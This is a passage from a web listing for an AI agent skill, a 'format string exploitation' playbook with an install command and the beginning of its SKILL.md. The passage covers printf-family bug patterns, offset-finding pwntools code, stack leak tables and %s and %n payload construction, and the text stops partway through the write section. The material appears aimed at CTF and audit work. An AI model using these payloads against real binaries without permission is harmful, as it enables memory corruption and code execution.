
Format String Exploitation
Follow a structured playbook when auditing or exploiting printf-family format string bugs in CTF binaries and native code.
Overview
Format String Exploitation is an agent skill most often used in Ship (also Build integrations, Operate iterate) that teaches printf-family leak-and-write exploitation from identification through pwntools automation.
Install
npx skills add https://github.com/yaklang/hack-skills --skill format-string-exploitationWhat is this skill?
- Vulnerability identification patterns for printf(user_input) and related sinks
- Stack read primitives (%p, %s) and write primitives (%n, %hn, %hhn) with offset guidance
- GOT overwrite, __malloc_hook targets, pointer chains, and blind format string scenarios
- 64-bit null-byte placement and FORTIFY_SOURCE bypass notes called out explicitly
- pwntools automation patterns and cross-links to stack overflow, heap, and arbitrary-write skills
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You found a printf-style sink in a binary but keep mis-counting format offsets or stalling after the first leak.
Who is it for?
Advanced builders doing CTF challenges, native code audits, or security labs where format strings are the primary primitive.
Skip if: Beginners learning web app security only, or teams without authorization to test the target binary.
When should I use this skill?
Printf-family functions receive user-controlled format strings, enabling stack reads, arbitrary writes, GOT/hook overwrites, and canary/libc/PIE leaks.
What do I get? / Deliverables
You leave with a documented attack chain—reads, writes, and hook/GOT strategy—that you can pair with stack, heap, or arbitrary-write skills for full exploitation.
- Documented leak offsets and write strategy
- pwntools-oriented exploit steps or PoC script outline
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Ship is the canonical shelf because format string work is part of hardening reviews and pre-release security assessment of native binaries. Security subphase covers vulnerability identification, leak primitives, and controlled writes before you trust a binary in production or a release artifact.
Where it fits
Pre-release review of a native CLI that logs user input through printf without a fixed format string.
You embed a legacy C library and need a checklist before linking it into your agent tooling binary.
A crash report suggests stack corruption and you suspect a dormant format string in an admin-only diagnostic path.
How it compares
Structured exploit playbook for native binaries—not a generic SAST scanner or web XSS checklist.
Common Questions / FAQ
Who is format-string-exploitation for?
Solo builders and security-focused developers who exploit or audit C/C++ binaries where printf-family functions consume attacker-controlled format strings.
When should I use format-string-exploitation?
Use it during Ship security reviews before release binaries ship; during Build when integrating native libraries you must fuzz; and during Operate iterate when reproducing a reported memory corruption issue in a CLI service.
Is format-string-exploitation safe to install?
Treat it as offensive knowledge—review the Security Audits panel on this page and only run techniques on systems you own or are explicitly permitted to test.
SKILL.md
READMESKILL.md - Format String Exploitation
# SKILL: Format String Exploitation — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string. ## 0. RELATED ROUTING - [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — combine format string leak with stack overflow for full exploit - [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — format string is the primary canary/PIE/ASLR leak method - [arbitrary-write-to-rce](../arbitrary-write-to-rce/SKILL.md) — convert format string write primitive to code execution targets - [heap-exploitation](../heap-exploitation/SKILL.md) — heap address leak via format string for heap exploitation --- ## 1. VULNERABILITY IDENTIFICATION ### Vulnerable Pattern ```c printf(user_input); // VULNERABLE: user controls format string fprintf(fp, user_input); // VULNERABLE sprintf(buf, user_input); // VULNERABLE snprintf(buf, sz, user_input); // VULNERABLE printf("%s", user_input); // SAFE: format string is fixed ``` ### Quick Test ``` Input: AAAA%p%p%p%p%p%p%p%p If output shows stack values (hex addresses): format string confirmed Look for 0x4141414141414141 in output to find your input offset ``` --- ## 2. READING MEMORY ### Stack Leak (%p) | Format | Action | Use | |---|---|---| | `%p` | Print next stack value as pointer | Sequential stack dump | | `%N$p` | Print N-th parameter as pointer | Direct positional access | | `%N$lx` | Same as %p but explicit hex (64-bit) | Portable | | `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value | ### Finding Your Input Offset ```python # Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p # Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141... # ↑ offset = 6 (example) # Or automated: for i in range(1, 30): io.sendline(f'AAAA%{i}$p') if '0x41414141' in io.recvline(): print(f'Offset = {i}') break ``` ### Leaking Specific Values | Target | Method | Stack Position | |---|---|---| | Canary | `%N$p` where N = canary offset from format string | Typically at offset buf_size/8 + few | | Saved RBP | `%N$p` (just above return address) | Leaks stack address → stack base | | Return address | `%N$p` | Leaks .text address (PIE base = leak & ~0xfff - offset) | | Libc address | `%N$p` where N points to `__libc_start_main+XX` return on stack | libc base = leak - offset | ### Reading Arbitrary Address (%s) ``` # 32-bit: place address at start of format string payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack # 64-bit: address contains null bytes → place AFTER format specifiers payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is ``` --- ## 3. WRITING MEMORY (%n) ### Write Specifiers | Specifier | Bytes Written | Width | |---|---|---| | `%n` | 4 bytes (int) | Characters printed so far | | `%hn` | 2 bytes (short) | Characters printed so far (mod 0x10000) | | `%hhn` | 1 byte (char) | Characters printed so far (mod 0x100) | | `%ln` | 8 bytes (long) | Characters printed so far | ### Arbitrary Write Technique **Goal**: Write value `V` to address `A`. **32-bit** (address on stack directly): ```python # Write 2 bytes at a time using %hn # Place target addresses in